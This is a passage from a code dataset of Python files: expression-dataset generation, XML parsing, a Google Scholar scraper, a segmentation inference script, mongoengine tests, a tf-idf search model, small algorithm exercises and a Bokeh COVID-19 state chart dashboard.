\"--configtest\"\nLS_CONFIGPATH_FLAG = \"--config\"\n\n\n\n\n\n\n\n","sub_path":"lumbermill/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"348631929","text":"import argparse\r\nimport math\r\nimport os\r\nimport random\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\n\r\nfrom model import OPERATIONS, MAX_EXPRESSION_LENGTH, MAX_RESULT_LENGTH,\\\r\n MIN_NUMBER, MAX_NUMBER, MAX_NUMBER_IN_EXPRESSION, VECTOR_SIZE\r\n\r\n\r\nclass _Expression:\r\n OPS = OPERATIONS\r\n GROUP_PROB = 0.3\r\n MIN_NUM, MAX_NUM 
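# A quick harness for the Solution above, using the three sample cases from
# the problem statement (assumes the class is in scope).
if __name__ == "__main__":
    s = Solution()
    print(s.maxTurbulenceSize([9, 4, 2, 10, 7, 8, 8, 1, 9]))  # expected 5
    print(s.maxTurbulenceSize([4, 8, 12, 16]))                # expected 2
    print(s.maxTurbulenceSize([100]))                         # expected 1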
= MIN_NUMBER, MAX_NUMBER\r\n\r\n def __init__(self, max_numbers):\r\n self._expression = str(random.randint(MIN_NUMBER, MAX_NUMBER))\r\n numbers_count = random.randint(2, max_numbers)\r\n for _ in range(1, numbers_count):\r\n left = self._expression\r\n left = self._maybe_group(left)\r\n right = str(random.randint(MIN_NUMBER, MAX_NUMBER))\r\n right = self._maybe_group(right)\r\n # always group negatives on the right side\r\n if random.random() < 0.5:\r\n left, right = right, left\r\n if right.startswith('-'):\r\n right = '({})'.format(right)\r\n op = random.choice(self.OPS)\r\n self._expression = \"{0}{1}{2}\".format(left, op, right)\r\n\r\n def _maybe_group(self, expression):\r\n if (random.random() < self.GROUP_PROB):\r\n return '({})'.format(expression)\r\n else:\r\n return expression\r\n\r\n def __str__(self):\r\n return self._expression\r\n\r\n\r\ndef generate_expression():\r\n return str(_Expression(MAX_NUMBER_IN_EXPRESSION))\r\n\r\n\r\ndef train_test_generator(samples_count):\r\n for _ in(range(samples_count)):\r\n expression = generate_expression()\r\n while len(expression) > MAX_EXPRESSION_LENGTH:\r\n expression = generate_expression()\r\n\r\n result = str(eval(expression))\r\n yield expression, result\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser(\r\n description='Generates dataset for training')\r\n\r\n parser.add_argument('-c', '--count',\r\n type=int,\r\n dest='samples_count',\r\n required=True,\r\n help='Count of (expression, result) pairs to generate')\r\n parser.add_argument('-o', '--output_path',\r\n dest='output_path',\r\n required=True,\r\n help='Path to save the dataset')\r\n parser.add_argument('-s', '--seed',\r\n type=int,\r\n dest='seed',\r\n help='Random seed')\r\n return parser.parse_args()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n args = get_args()\r\n out_path = os.path.abspath(args.output_path)\r\n parent_dir = os.path.dirname(out_path)\r\n if not os.path.exists(parent_dir):\r\n os.makedirs(parent_dir)\r\n\r\n if args.seed is not None:\r\n random.seed(args.seed)\r\n X, Y = zip(*tqdm(train_test_generator(args.samples_count),\r\n total=args.samples_count))\r\n data = {'X': X, 'Y': Y}\r\n dataframe = pd.DataFrame(data)\r\n\r\n print('Saving to {}'.format(out_path))\r\n dataframe.to_hdf(out_path, key='train_data',\r\n mode='w', format='fixed')\r\n","sub_path":"generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"130210867","text":"### Example 8-14: Printing information for a range of proteins\n\nimport sys\nimport xml.etree.cElementTree as ETree\n\nfrom ch08_12 import print_subtree\n\ndef describe_proteins(tree, limit=2, start=1):\n # start at 1 because 0 is the whole genome!\n iter = tree.getiterator('Seq-entry')\n # +1 to always skip entry for entire genome\n for n in range(start+1):\n next(iter)\n for k in range(limit+1):\n print('{:4}'.format(k+start))\n print_subtree(next(iter), 6)\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n filename = '../data/Acidobacterium-capsulatum-sequences.xml'\n else:\n filename = sys.argv[1]\n tree = ETree.parse(filename)\n descrs = root.getiterator('Seqdesc_source')\n print()\n describe_proteins(tree)\n","sub_path":"chapter_examples/ch08_14.py","file_name":"ch08_14.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"431212039","text":"# builtin\nimport 
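# Note on ch08_14.py above: getiterator() was deprecated and removed in
# Python 3.9; Element.iter()/ElementTree.iter() is the drop-in replacement.
# A minimal self-contained demonstration:
import xml.etree.ElementTree as ET

tree = ET.ElementTree(ET.fromstring("<root><Seq-entry/><Seq-entry/></root>"))
for entry in tree.iter("Seq-entry"):  # was: tree.getiterator("Seq-entry")
    print(entry.tag)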
sys\nimport argparse\nimport logging\n\n# internal\nfrom gscrape import utils\nfrom gscrape.session import EndNoteSession\nfrom gscrape.query import GoogleScholarQuery\nfrom gscrape.download import EndNoteDownloader\n\n# Lazy-loaded logger\nLOG = logging.getLogger(__name__)\n\n# Offset step for search results.\nOFFSET_STEP = 10\n\n\ndef init_session():\n LOG.info(\"Initializing HTTP session with Google Scholar...\")\n return EndNoteSession()\n\n\ndef init_logging(level=logging.INFO):\n fmt = '[%(levelname)s] [%(asctime)s] %(message)s'\n logging.basicConfig(level=level, format=fmt)\n\n\ndef search(term, options, session):\n \"\"\"Perform a Google Scholar search and download the results.\n \"\"\"\n total = 0 # number of articles downloaded\n offset = 0 # search offset.\n\n LOG.info(\"Initializing Google Scholar query handler...\")\n query = GoogleScholarQuery(session)\n\n LOG.info(\"Initializing EndNote downloader...\")\n downloader = EndNoteDownloader(session)\n\n while (offset // OFFSET_STEP) < options.limit:\n LOG.debug(\"Searching for '%s' @ offset %d\", term, offset)\n\n # Run the query\n result = query(term, year_from=options.start, offset=offset)\n\n # Sleep before attempting to download anything\n utils.randsleep()\n\n # Download the links embedded in the search results.\n num = downloader.download(result, outdir=options.outdir)\n\n if not num:\n break\n\n LOG.debug(\"Downloaded %d articles for term '%s'.\", num, term)\n\n total += num\n offset += OFFSET_STEP\n\n LOG.info(\"Downloaded %d articles for term '%s'\", total, term)\n\n\ndef _get_parser():\n parser = argparse.ArgumentParser(description=\"Google Scholar Scraper\")\n\n parser.add_argument(\n \"terms\",\n metavar='TERM',\n type=str,\n nargs=\"+\",\n help=\"Search terms.\",\n )\n\n parser.add_argument(\n \"--limit\",\n type=int,\n default=sys.maxint,\n help=(\"The upper limit on the number of result pages to download per \"\n \"search term.\")\n )\n\n parser.add_argument(\n \"--from-year\",\n dest=\"start\",\n type=int,\n default=\"1000\",\n help=\"Only download links from this year forward.\"\n )\n\n parser.add_argument(\n \"--dir\",\n dest=\"outdir\",\n default=\".\",\n help=\"Download directory.\"\n )\n\n parser.add_argument(\n \"--log-level\",\n default=\"INFO\",\n choices=[\"DEBUG\", \"INFO\", \"WARN\", \"ERROR\"],\n help=\"The logging output level.\",\n )\n\n return parser\n\ndef main():\n # Parse comment-line arguments\n parser = _get_parser()\n args = parser.parse_args()\n\n try:\n # initialize the logging\n init_logging(args.log_level)\n\n # initialize the google scholar session\n session = init_session()\n\n # Do the search\n for term in args.terms:\n search(term, args, session)\n\n except Exception as ex:\n LOG.error(str(ex))\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"scripts/run-gscrape.py","file_name":"run-gscrape.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"393433585","text":"# _*_ coding: utf-8 _*_\n# @author: anniequ\n# @file: test.py\n# @time: 2020/11/17 15:02\n# @Software: PyCharm\n\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom PIL import Image\nimport numpy as np\nimport torchvision.models as models\nimport torch\n\nfrom datapre import VOCSegDataset, crop, classes\nfrom resunet import resnet34\n\nheight = 224\nwidth = 224\n\nvoc_test = VOCSegDataset(False, height, width)\n\n\nvalid_data = DataLoader(voc_test, 
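# Note on run-gscrape.py above: sys.maxint exists only on Python 2. A
# version-agnostic default for --limit (illustrative):
import sys

LIMIT_DEFAULT = getattr(sys, "maxint", sys.maxsize)  # maxsize on Python 3
print(LIMIT_DEFAULT)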
batch_size=8)\n\nPATH = r\"./model/weights-33.pth\"\n# 各种标签所对应的颜色\nCOLORMAP = [[0, 0, 0], [1, 0, 128], [0, 128, 1], [0, 128, 129], [128, 0, 0]]\ncm = np.array(COLORMAP).astype('uint8')\n\n\ndef predict(img1, label):\n img1 = Variable(img1.unsqueeze(0)).cuda()\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n net = resnet34(3,5).to(device)\n\n net.load_state_dict(torch.load(PATH))\n out = net(img1)\n pred = out.max(1)[1].squeeze().cpu().data.numpy()\n pred = cm[pred]\n\n pred = Image.fromarray(pred)\n label1 = cm[label.numpy()]\n return pred, label1\n\n\nSIZE = 224\nNUM_IMG = 20\n# _, figs = plt.subplots(NUM_IMG, 3, figsize=(12, 22))\nfor i in range(51):\n img_data, img_label = voc_test[i]\n pred, label = predict(img_data, img_label)\n img_data = Image.open(voc_test.data_list[i])\n img_label = Image.open(voc_test.label_list[i])\n img_data, img_label = crop(img_data, img_label, SIZE, SIZE)\n pred.save(\"./pred/\"+str(i)+\"_pred.png\",'PNG')\n img_data.save(\"./pred/\"+str(i)+\"_img.png\",'PNG')\n print(\"the picture {} has predicted.\".format(i))\n\nprint(\"saving predict results finish.\")\n","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"199712576","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pytest\nimport mongoengine\nfrom sfm.mongoengine_mate import ExtendedDocument\n\n\nclass User(ExtendedDocument):\n id = mongoengine.IntField(primary_key=True)\n name = mongoengine.StringField()\n\n\ndef test_keys_values_items():\n user = User(id=1, name=\"Jack\")\n\n assert user.keys() == [\"id\", \"name\"]\n assert user.values() == [1, \"Jack\"]\n assert user.items() == [(\"id\", 1), (\"name\", \"Jack\")]\n\n\ndef test_to_tuple_list_dict_OrderedDict_json():\n user = User(id=1, name=\"Jack\")\n\n assert user.to_tuple() == (\"id\", \"name\")\n assert user.to_list() == [\"id\", \"name\"]\n assert user.to_dict() == {\"id\": 1, \"name\": \"Jack\"}\n assert user.to_OrderedDict() == {\"id\": 1, \"name\": \"Jack\"}\n\n assert user.to_json() == '{\"_id\": 1, \"name\": \"Jack\"}'\n\n\ndef test_absorb_and_revise():\n user = User(id=1, name=\"Jack\")\n user.absorb(User(name=\"Tom\"))\n assert user.name == \"Tom\"\n\n user_data = {\"name\": \"Mike\"}\n user.revise(user_data)\n assert user.name == \"Mike\"\n\n\nif __name__ == \"__main__\":\n import os\n pytest.main([os.path.basename(__file__), \"--tb=native\", \"-s\", ])\n","sub_path":"tests/test_mongoengine_mate.py","file_name":"test_mongoengine_mate.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"52925077","text":"from nltk.corpus import stopwords\r\nimport pandas as pd\r\nfrom pandas import DataFrame\r\nimport pprint as pp\r\nfrom collections import OrderedDict\r\nfrom nltk import sent_tokenize, word_tokenize, PorterStemmer, WordNetLemmatizer\r\nimport numpy as np\r\nimport math as m\r\nimport operator\r\n\r\n\r\n\r\ndef readData(fileName):\r\n\r\n data = pd.read_excel(fileName)\r\n #data = pd.read_csv(fileName)\r\n\r\n #print(data)\r\n #print(data.shape)\r\n rows = data.shape[0]\r\n columns = data.shape[1]\r\n print(data.shape)\r\n #print(sent_tokenize(data[\"Text\"][1]))\r\n #print(word_tokenize(sent_tokenize(data[\"Text\"][1])[2]))\r\n return data, rows, columns\r\n\r\ndef checkKeys(keySet1, keySet2):\r\n\r\n for key in keySet1:\r\n if key not in keySet2:\r\n return False\r\n\r\n 
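# Sketch: predict() in t.py above rebuilds and reloads the network for every
# image. Hoisting the load out of the loop is the usual fix; resnet34, PATH
# and voc_test are that script's names, so the core lines stay commented to
# keep this snippet self-contained.
import torch

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# net = resnet34(3, 5).to(device)
# net.load_state_dict(torch.load(PATH, map_location=device))
# net.eval()
# with torch.no_grad():
#     for img_data, img_label in voc_test:
#         out = net(img_data.unsqueeze(0).to(device))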
return True\r\n\r\ndef combineDicts(dict1, dict2):\r\n\r\n combinedDict = dict()\r\n\r\n if checkKeys(dict1, dict2):\r\n for k in dict1.keys():\r\n combinedDict[k] = (dict1[k], len(dict2[k]), dict2[k]) #()\r\n else:\r\n return -1\r\n return combinedDict\r\n\r\ndef tokenizer(data: DataFrame, rows, columns):\r\n tokenDict = dict() #\"\": (tf(overall), df, [list of docs it appears in])\r\n tokenDocs = dict()\r\n tokPostings = dict() #\"\": {docid: [tf in that doc, max_tf, doclen], ...}\r\n docInfo = dict()\r\n lematizer = WordNetLemmatizer()\r\n stopWords = set(stopwords.words(\"english\"))\r\n\r\n for i in range(0, rows):\r\n tf = 1\r\n max_tf = 1\r\n doclen = 0\r\n docNo = i\r\n tokens1 = word_tokenize(data[\"Title\"][i])\r\n tokens = list()\r\n #print(data[\"Text\"][i])\r\n sentenceList = sent_tokenize(data[\"Text\"][i])\r\n for sentence in sentenceList:\r\n tmp = word_tokenize(sentence)\r\n for t in tmp:\r\n tokens.append(t)\r\n\r\n #tokens = word_tokenize(sent_tokenize(data[\"Text\"]))\r\n\r\n for t in tokens1:\r\n tokens.append(t)\r\n\r\n for tok in tokens:\r\n doclen += 1\r\n if tok in stopWords:\r\n continue\r\n word = lematizer.lemmatize(tok)\r\n if word in tokenDict:\r\n tokenDict[word] = tokenDict.get(word) + 1\r\n tokenDocs[word].add(docNo)\r\n # tokPostings[word].\r\n else:\r\n tokenDict[word] = 1\r\n tokenDocs[word] = {docNo}\r\n # tokPostings[word] = {docNo:1}\r\n if word in tokPostings:\r\n if docNo in tokPostings[word].keys():\r\n tokPostings[word][docNo][0] = tokPostings[word][docNo][0] + 1\r\n tf = tokPostings[word][docNo][0]\r\n if tf > max_tf:\r\n max_tf = tf\r\n else:\r\n tokPostings[word][docNo] = [1, 0, 0]\r\n else:\r\n tokPostings[word] = {docNo: [1, 0, 0]} # {docid: (tf,max_tf, doclen)}\r\n\r\n docInfo[docNo] = [max_tf, doclen]\r\n for word in tokPostings.keys():\r\n for doc in tokPostings[word]:\r\n tokPostings[word][int(doc)][1] = docInfo[int(doc)][0]\r\n tokPostings[word][int(doc)][2] = docInfo[int(doc)][1]\r\n sumOfDoclens = 0\r\n for doc in docInfo:\r\n sumOfDoclens += docInfo[doc][1]\r\n avgDoclen = sumOfDoclens / rows\r\n fullTokenDict = combineDicts(tokenDict, tokenDocs) # combine dictionaries with same key set\r\n\r\n\r\n if fullTokenDict == -1:\r\n print(\"Failed in combining dictionaries\")\r\n return\r\n # else:\r\n # print(fullTokenDict)\r\n # print(tokenDict)\r\n # stemmedTokenDict, stemmedTokenDocs = stemmer(tokenDict)\r\n return fullTokenDict, tokPostings, avgDoclen\r\n\r\ndef getDocVector(queryVector, docNo, tokDict: dict, tokPostings: dict):\r\n docVector = dict() # {}\r\n for word in queryVector:\r\n if word in tokDict.keys():\r\n if docNo in tokDict[word][2]:\r\n tmp = list() #(df, tf, max_tf, doclen)\r\n tmp.append(tokDict[word][1])\r\n tmp.append(tokPostings[word][docNo][0])\r\n tmp.append(tokPostings[word][docNo][1])\r\n tmp.append(tokPostings[word][docNo][2])\r\n docVector[word] = tmp.copy()\r\n\r\n\r\n\r\n return docVector\r\n\r\ndef calcScore(docVector: dict, queryVector: list, collectionSize):\r\n W1 = np.zeros(len(queryVector))\r\n\r\n Q1 = np.zeros(len(queryVector))\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n similarKeys = list()\r\n query_info = dict() #({word: [tf] })\r\n\r\n for q in queryVector:\r\n if q in query_info:\r\n query_info[q] = query_info.get(q) + 1\r\n else:\r\n query_info[q] = 1\r\n q_maxtf = max(query_info.values())\r\n for q in queryVector:\r\n if q in docVector:\r\n similarKeys.append(q)\r\n for word in similarKeys:\r\n lemma = lemmatizer.lemmatize(word)\r\n tf = float(docVector[lemma][1])\r\n q_tf = 
float(query_info[lemma])\r\n df_t = float(docVector[lemma][0])\r\n q_df_t = float(query_info[lemma])\r\n maxtf = float(docVector[lemma][2])\r\n index = queryVector.index(lemma)\r\n doclen = float(docVector[lemma][3])\r\n\r\n tf_t_d = 1 + m.log10(tf)\r\n q_tf_t_d = 1 + m.log10(q_tf)\r\n\r\n idf_t = m.log10(collectionSize/(df_t+1))\r\n q_idf_t = m.log10(collectionSize/(q_df_t+1))\r\n\r\n tf_idf = tf_t_d * idf_t\r\n q_tf_idf = q_tf_t_d * q_idf_t\r\n # ###\r\n # [0.4 + 0.6 * log(tf + 0.5) / log(maxtf + 1.0)]\r\n # *[log(collectionsize / df) / log(collectionsize)]\r\n # ###\r\n #w_val1 = (0.4 + 0.6*m.log10(tf + 0.5)/m.log10(maxtf + 1.0)) * (m.log10(collectionSize/df))/m.log10(collectionSize)\r\n w_val1 = tf_idf\r\n q_val1 = q_tf_idf\r\n #q_val1 = (0.4 + 0.6*m.log10(q_tf + 0.5)/m.log10(q_maxtf + 1.0)) * (m.log10(collectionSize/df)/m.log10(collectionSize))\r\n W1[index] = w_val1\r\n Q1[index] = q_val1\r\n\r\n norm_W1 = W1 / np.linalg.norm(W1)\r\n norm_Q1 = Q1 / np.linalg.norm(Q1)\r\n score1 = np.dot(norm_Q1, norm_W1)\r\n\r\n\r\n return score1, norm_W1, norm_Q1\r\n\r\ndef printInfo(fileName, all_vectors1: list, info_vectors1: dict):\r\n file = open(fileName, 'w', encoding=\"utf-8\")\r\n matrix = list()\r\n counter = 0\r\n for item in reversed(all_vectors1):\r\n tmp = list()\r\n\r\n counter += 1\r\n tmp.append(counter)\r\n tmp.append(item[0])\r\n tmp.append(info_vectors1[item[0]][2])\r\n tmp.append(info_vectors1[item[0]][3])\r\n tmp.append(item[1])\r\n tmp.append(info_vectors1[item[0]][0])\r\n tmp.append(info_vectors1[item[0]][1])\r\n\r\n matrix.append(tmp)\r\n\r\n file.write(\"Rank:{}\\nDoc:{}\\nTitle:{}\\nLink:{}\\nScore:{}\\nQueryVec:{}\\nDocVec{}\\n\".format(counter,\r\n item[0],\r\n info_vectors1[item[0]][2],\r\n info_vectors1[item[0]][3],\r\n item[1],\r\n info_vectors1[item[0]][0],\r\n info_vectors1[item[0]][1]))\r\n file.write(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\r\n matrix = np.asmatrix(matrix)\r\n return matrix\r\n\r\n\r\ndef vector_space_model(query, tokDict, tokPostings, collectionSize, data: DataFrame):\r\n stopWords = set(stopwords.words(\"english\"))\r\n lematizer = WordNetLemmatizer()\r\n sorted_all_vectors1 = dict()\r\n queryVector = list()\r\n all_vectors1 = OrderedDict()\r\n info_vectors1 = dict()\r\n\r\n\r\n q = word_tokenize(query)\r\n for word in stopWords:\r\n if word in q:\r\n q.remove(word)\r\n for w in q:\r\n queryVector.append(lematizer.lemmatize(w))\r\n #print(queryVector)\r\n for doc in range(0, collectionSize): #docNoRange = no rows\r\n docVector = getDocVector(queryVector, doc, tokDict, tokPostings)\r\n if len(docVector) == 0:\r\n continue\r\n score1, w1, q1 = calcScore(docVector, queryVector, collectionSize)\r\n all_vectors1[doc] = score1\r\n info_vectors1[doc] = (q1, w1, data[\"Title\"][doc], data[\"Link\"][doc])\r\n sorted1 = sorted(all_vectors1.items(), key=operator.itemgetter(1))\r\n\r\n fname1 = \"query_results.txt\"\r\n matrix = printInfo(fname1, sorted1, info_vectors1)\r\n return matrix\r\n\r\n# data, rows, columns = readData(\"crawled_data.xlsx\")\r\n\r\n# tokenDict, tokPostings, avgDoclen = tokenizer(data, rows, columns)\r\n# outFile1 = open(\"tokDict.txt\", 'w', encoding='utf-8')\r\n# outFile2 = open(\"tokPostings.txt\", 'w', encoding='utf-8')\r\n# pp.pprint(tokenDict, stream=outFile1)\r\n# pp.pprint(tokPostings, stream=outFile2)\r\n# vector_space_model(\"Just across the Potomac river from our nation's capital sits Arlington, Virginia, a beautiful city filled with bustling businesses, thriving tech startups, 
and an innovative vibe that is drawing founders to this growing region\",tokenDict, tokPostings,rows, data)\r\n\r\n","sub_path":"index/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"506527572","text":"class Solution:\n # @param A : list of list of integers\n # @return an integer\n def minPathSum(self, A):\n y = len(A)\n x = len(A[0])\n\n j = 0\n for i in range(1, x):\n A[j][i] = A[j][i-1] + A[j][i]\n\n j = 0\n for i in range(1, y):\n A[i][j] = A[i-1][j] + A[i][j]\n\n for i in range(1, y):\n for j in range(1, x):\n A[i][j] = min(A[i-1][j] + A[i][j], A[i][j-1] + A[i][j])\n\n return A[-1][-1]\n\n def solve(self, matrix):\n ans = self.minPathSum(matrix)\n print(f'iterative ans is {ans}')\n\n\n\n# if __name__ == '__main__':\n# a = [[1, 3, 2],\n# [4, 3, 1],\n# [5, 6, 1]]\n\n# obj = Solution()\n# ans = obj.minPathSum(a)\n# print(f'ans is {ans}')\n","sub_path":"scaler/dp2/dp2/min_sum_path_in_matrix.py","file_name":"min_sum_path_in_matrix.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"185891971","text":"# returns true if the string passed as an argument is a palindrome\n\ndef validarPalindromo(str):\n is_palindromo = True\n str = str.lower()\n reverse_str = str[::-1]\n print(f'Comparing: {str} with {reverse_str}')\n\n for idx, char in enumerate(str):\n if(char != reverse_str[idx]):\n is_palindromo = False\n\n print(f'Is the string {str} a palindrome? A: {is_palindromo}')\n return is_palindromo\n\n\nvalidarPalindromo('abc123321cba')\nvalidarPalindromo('Carlos')\nvalidarPalindromo('123321')\nvalidarPalindromo('123456')\n\n\n","sub_path":"practica_02_palindromo/palindromo.py","file_name":"palindromo.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"474908855","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pandas import DataFrame\nimport seaborn as sns\nimport json\nimport requests\nimport os.path\nimport lxml\nfrom matplotlib.ticker import AutoMinorLocator\nimport csv\nfrom pandas.io.json import json_normalize\nimport math\nfrom bokeh.io import show, output_file\nfrom bokeh.models import ColumnDataSource, Legend, LegendItem, Scatter, Label\nfrom bokeh.plotting import figure, output_file, show, output_notebook, curdoc\nfrom bokeh.models.tools import HoverTool\nfrom bokeh.core.properties import value\nfrom bokeh.palettes import Spectral11\nimport itertools\nfrom bokeh.layouts import row, column\nfrom bokeh.models.annotations import Title\nfrom bokeh.models import Panel, Tabs\nfrom datetime import timedelta\nfrom bokeh.models import LinearAxis, Range1d\nfrom bokeh.models import Div\n\n\nbokeh_doc=curdoc()\n\ncases_summary = requests.get('https://api.rootnet.in/covid19-in/stats/history')\n\njson_data = cases_summary.json()\ncases_summary=pd.json_normalize(json_data['data'], record_path='regional', meta='day')\n\ncases_summary['loc']=np.where(cases_summary['loc']=='Nagaland#', 'Nagaland', cases_summary['loc'])\n\nlatest_date=cases_summary['day'].max()\nhighest_state=cases_summary[cases_summary['totalConfirmed']==cases_summary['totalConfirmed'].max()]['loc'].tolist()[0]\n\nlegend_it=[]\n\np = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\np.title.text='Statewise Cases over 
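# Sketch (names are mine): calcScore in read.py above weights each term with
# (1 + log10(tf)) * log10(N / (df + 1)) and scores a document by the dot
# product of the L2-normalised query and document vectors. In isolation:
import math
import numpy as np

def tf_idf(tf, df, n_docs):
    return (1 + math.log10(tf)) * math.log10(n_docs / (df + 1))

doc = np.array([tf_idf(3, 10, 1000), tf_idf(1, 200, 1000)])
query = np.array([tf_idf(1, 10, 1000), tf_idf(1, 200, 1000)])
print(float(np.dot(query / np.linalg.norm(query), doc / np.linalg.norm(doc))))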
Time'\np.title.align='center'\np.title.text_font_size='17px'\np.xaxis.axis_label = 'Date'\np.yaxis.axis_label = 'Number of Cases'\n\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=p.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['totalConfirmed'], line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n legend_it.append((name, [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\np.add_layout(legend1,'right')\np.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\nsource=ColumnDataSource(cases_summary)\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Cases', '@y{0000}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\np.add_tools(hover)\n\ncitation = Label(x=0, y=0, x_units='screen', y_units='screen',\n text='Last Updated : {}'.format(latest_date), render_mode='css', text_font_size='12px')\np.add_layout(citation, 'above')\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nfig = column(p,div, sizing_mode='scale_both')\ntab1 = Panel(child=fig, title=\"All Cases - Statewise\")\n\n#statewise death count over time\n\nlegend_it=[]\n\nq = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\nq.title.text='Statewise Deaths over Time'\nq.title.align='center'\nq.title.text_font_size='17px'\nq.xaxis.axis_label = 'Date'\nq.yaxis.axis_label = 'Number of Deaths'\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=q.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['deaths'], line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n legend_it.append((name, [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\nq.add_layout(legend1,'right')\nq.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Deaths', '@y{0000}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\nq.add_tools(hover)\n\ncitation = Label(x=0, y=0, x_units='screen', y_units='screen',\n text='Last Updated : {}'.format(latest_date), render_mode='css', text_font_size='12px')\nq.add_layout(citation, 'above')\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nfig = column(q,div, sizing_mode='scale_both')\n\n\ntab2 = Panel(child=fig, title=\"All Deaths - Statewise\")\n\n#statewise case-to-death ratio over 
time\n\nlegend_it=[]\n\ns = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\ns.title.text='Statewise Case-to-Death Ratio over Time'\ns.title.align='center'\ns.title.text_font_size='17px'\ns.xaxis.axis_label = 'Date'\ns.yaxis.axis_label = 'Case-to-Death Ratio'\n\ncases_summary['case-death-ratio']=cases_summary['totalConfirmed']/cases_summary['deaths']\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.inf,0)\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.nan,0)\n\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=s.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['case-death-ratio'], line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n legend_it.append((name, [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\ns.add_layout(legend1,'right')\ns.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Case-to-death Ratio', '@y{000.000}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\ns.add_tools(hover)\n\ncitation = Label(x=0, y=0, x_units='screen', y_units='screen',\n text='Last Updated : {}'.format(latest_date), render_mode='css', text_font_size='12px')\ns.add_layout(citation, 'above')\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 